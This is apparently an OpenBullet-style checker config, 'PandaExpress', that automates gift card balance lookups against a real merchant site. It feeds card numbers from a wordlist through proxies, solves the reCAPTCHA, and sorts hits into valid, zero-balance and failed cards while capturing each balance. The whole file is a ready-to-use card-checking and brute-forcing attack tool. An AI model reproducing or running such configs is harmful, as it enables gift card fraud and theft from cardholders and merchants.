[SETTINGS]
{
  "Name": "PandaExpress",
  "SuggestedBots": 1,
  "LastModified": "2018-09-04T10:47:45.3234969+00:00",
  "AdditionalInfo": "",
  "Author": "v0ilawes",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "None",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
RECAPTCHA "https://pandaexpress.wgiftcard.com/card/balance/check/pandaexpress/1" "6LcmqwITAAAAAD_8PDdcM-9AhyftRNtFXn1U5e_8" -> VAR "captcha" 
#GET_LOGIN_PAGE REQUEST GET "https://pandaexpress.wgiftcard.com/card/balance/check/pandaexpress/1" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#PARSE_SECURITY_CODE PARSE "<SOURCE>" CSS "[name=security_code]" "value" 0 -> VAR "SECURITY_CODE" "" "" 
#POST_LOGIN REQUEST POST "https://merchant.wgiftcard.com/card/balance/checkBalance/pandaexpress/1" AutoRedirect=TRUE 
  CONTENT "security_code=SECURITY_CODE&card_number=<USER>&email_address=&mobile_phone=&g-recaptcha-response=<captcha>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Invalid account number or the account is closed." 
  KEYCHAIN Success OR 
    KEY "bold;\">$" 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY "bold;\">$0" 
  KEYCHAIN Retry OR 
    KEY "Your request could not be processed at this time." 
PARSE "<SOURCE>" LR "bold;\">$" "<" Recursive=FALSE -> CAP "Balance" "$" "" 
